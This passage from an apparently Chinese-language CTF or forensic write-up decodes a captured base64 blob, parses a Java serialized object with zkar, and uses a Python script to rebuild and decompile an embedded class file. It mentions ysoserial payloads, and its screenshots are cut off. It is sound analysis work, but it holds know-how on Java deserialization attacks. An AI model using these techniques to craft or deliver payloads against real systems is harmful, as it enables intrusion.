base64_string=<span class=hljs-string>"$base64_string<span class=hljs-variable>$padding_string</span>"</span>
|
|||
|
|
<span class=hljs-keyword>fi</span>
|
|||
|
|
|
|||
|
|
<span class=hljs-built_in>echo</span> <span class=hljs-string>"<span class=hljs-variable>$base64_string</span>"</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=51>然后处理base64和开头的<code>00</code>的问题</p>
|
|||
|
|
<pre blockindex=52><code class="hljs language-bash">cat target_base64.bin | base64 -d > target_00.bin
|
|||
|
|
tail -c +2 target_00.bin > restore.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=53>然后就是用zkar解析一波</p>
|
|||
|
|
<pre blockindex=54><code class="hljs language-bash">./zkar dump -f restore.bin > restore.txt
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=55>将中间反序列化部分扣出来,保存成ser_hex.txt</p>
|
|||
|
|
<p blockindex=56><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=57><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=58>然后执行下面的脚本保存成class文件:</p>
|
|||
|
|
<pre blockindex=59><code class="hljs language-bash">import re
|
|||
|
|
import sys
|
|||
|
|
|
|||
|
|
def remove_hex_line(input_string):
|
|||
|
|
pattern = re.compile(r<span class=hljs-string>'[0-9a-fA-F]{8}'</span>)
|
|||
|
|
<span class=hljs-built_in>return</span> re.sub(pattern, <span class=hljs-string>''</span>, input_string)
|
|||
|
|
|
|||
|
|
def remove_vertical_line(input_string):
|
|||
|
|
pattern = re.compile(r<span class=hljs-string>'\|.*\|'</span>)
|
|||
|
|
<span class=hljs-built_in>return</span> re.sub(pattern, <span class=hljs-string>''</span>, input_string)
|
|||
|
|
|
|||
|
|
def extract_hex_to_file(input_filename, output_filename):
|
|||
|
|
with open(input_filename, <span class=hljs-string>"r"</span>) as file:
|
|||
|
|
input_text = file.read()
|
|||
|
|
|
|||
|
|
input_text = remove_hex_line(input_text)
|
|||
|
|
input_text = remove_vertical_line(input_text)
|
|||
|
|
hex_data = re.findall(r<span class=hljs-string>"[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*"</span>, input_text)
|
|||
|
|
hex_string = <span class=hljs-string>""</span>.join(hex_data).replace(<span class=hljs-string>" "</span>, <span class=hljs-string>""</span>)
|
|||
|
|
|
|||
|
|
with open(output_filename, <span class=hljs-string>"wb"</span>) as file:
|
|||
|
|
file.write(bytes.fromhex(hex_string))
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>if</span> __name__ == <span class=hljs-string>"__main__"</span>:
|
|||
|
|
<span class=hljs-keyword>if</span> len(sys.argv) != 3:
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"Usage: python3 extract_hex.py input_filename output_filename"</span>)
|
|||
|
|
sys.exit(1)
|
|||
|
|
|
|||
|
|
input_filename = sys.argv[1]
|
|||
|
|
output_filename = sys.argv[2]
|
|||
|
|
|
|||
|
|
extract_hex_to_file(input_filename, output_filename)
|
|||
|
|
</code></pre>
|
|||
|
|
<pre blockindex=60><code class="hljs language-bash">python3 extract_hex.py ser_hex.txt restore.class
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=61>拿到class,然后丢到idea中,自己反编译了</p>
|
|||
|
|
<p blockindex=62><img src="data:image/png;base64,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
|
|||
|
|
<h2 blockindex=63>0x05 后言</h2>
|
|||
|
|
<p blockindex=64>在分析的时候,发现 ysoserial 两次生成Payload会不一样的。。。卡了我好一会。。。</p>
|
|||
|
|
<p blockindex=65><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABc0AAAGKCAYAAADewWlLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAgAElEQVR4nOydeXhU1fnHP3NnMplsk33fN0gIgQBh30R2BEQQl7pb61ZbW1tb21qrrbVqra1aba3+aq3V4gIuKAoqEAJhXwMhQDaSkH3fk5m59/fHTSaZbHMnmSRo5/M8PGTmnjn3Pcs9997vec97VGFhYdJzv76XsUIEDjcLZLYKY2aDAwcOHDhw8L+An6aUme5f4CI0jsn5a2ogLw/GjwcPjzExwYGdkST4YrvA0aNjbYkDBw4cOHDgwIEDBw4c2A+1Xq9/fNnC1DEzQAWEaSX0aomCDodwPlbMjI7i+hmpzIqN4WRhEUZR/Fac65tojwMH/2s4rsHRo0X0oLA9EW9NBW7qhlE9d2EhvP5/AjW1KtLSVCRPlHBx6T4uSdDRARrNqJrlYJioVBATLVFZoaK6eqytceDAgQMHDhw4cODAgQP7MKxXU5MosjP9GP5+nqQkxQ/LkDhniSqjyOlvkMf5zKhIXLVa0i7kIEqSXfMZHxjIpPAwvN1caWpr42J1DccuFtJqMNjLfAui/f2ZFRsDwJv7Mmw6zzVTU1icmGjx3dPbPqe4ts7u57KVrt40mAQ30va4OzszJy5WtkMUqWpqoqy+gbKG0RWsRouhXBfPbtyAq1bLwbx83tp/YIQtVEaolxdxgQE4azRIokTa+fN0mEw25ZEUEkJ8YAA+bq4YRZHTxSVklZTQZjTabE+AhzupUVGEentRUlfPkYICyhuUewtfzv1wNMcEa7g5OTE1KpLxQUGcLy/nWMFFmjo6LNIIwKTwMKL9/fB1c6eupYVjhYXkVVbZdC5b8onx9yMuIACAU0XFw2q3dknH/qaruFL/Lh7q2iHnYyunMgUmJMD6DSL/fEPg9BmYP08+dvEifLJVoLERUqfBsmWOiRMlVFVDQz0EB2MxAdGbtjZZ3HZ2Hvh4VRX4+YFOZ7sdajWsXSuy6V2BoiLbf98fKSng6gIZ++2T3+XCi3+4n+BAHzbe+eRYm/Kt5ulf30lkeCA33v0Hm3+7ce187rtjjfnza29t479bdg/Lnsup3SclRTN1UhyhQX7U1DVy4MhZjmfmAraXfVj1fPUCbrt+CU/9eRMZh7MGTRsW4kdKcizt7Ua+3G37spZHN2gI9YFnPzKSXwnP3qzBXQePbjJS02RzdqPCb67VEBkAd75i+zOjNRYkqHB3gW3Hh/7+ak9Gyp5vYrt/WxmJcdUW3nn1Eeobmrnv4ZcU/+bPT95DZHgg62/7raL0wxkPHThwcPkyLNH8mZf+zfm8Yp54+C67GDPDTaSoQ0W9SWWX/EaSYE899y6cT0NrK3tz8xA7xTQXjYYfTkshr66e989dGFI+G1OnsXH6tD5pz1wq4YlPPrV7WYaLt5sbAXrLdfYuWu0YWdNNalQkP1u5HIDfbf2MzOJLY2JHmI83dy2Y1+f7IwUX+Wf6XqqamsfAqpFhoOvCGiFenmg1Gnzd3UbYQmX8aOlis8DcRealSzYLlY+tvQqVqns8Wz15EgaTib/vSiP9Qo7ifCJ9ffj1mtXoXbrVrA2pU/n91s/IVSjU/i/1w6EyPz6OexctxEmtBmDZxAkYRZHX0vawK/s8AC5OTvxg8SJSo6MsfjspPIzHPvpE8blsycfFyYmfrliGn7s7AK/u3jPsyQ6DpOVA0yqWeP4X1aDTivbD318kPV3gi+0CFRUwZ073sT3pAjHRkJQk8p+3Baalgq/PqJhlE1s2C0RGiUzre4seVSqrYPP7AlU18meVCqKiYN3VIm49htG8PNi7T6CwUBbE772nb1t/vVNgfw9hesYMWLbU9j7h7AzrrxF5+x2BKtvmj/plXLyItzdk7P/mOFMoISzEj/AQv7E241tPTFQw8TGh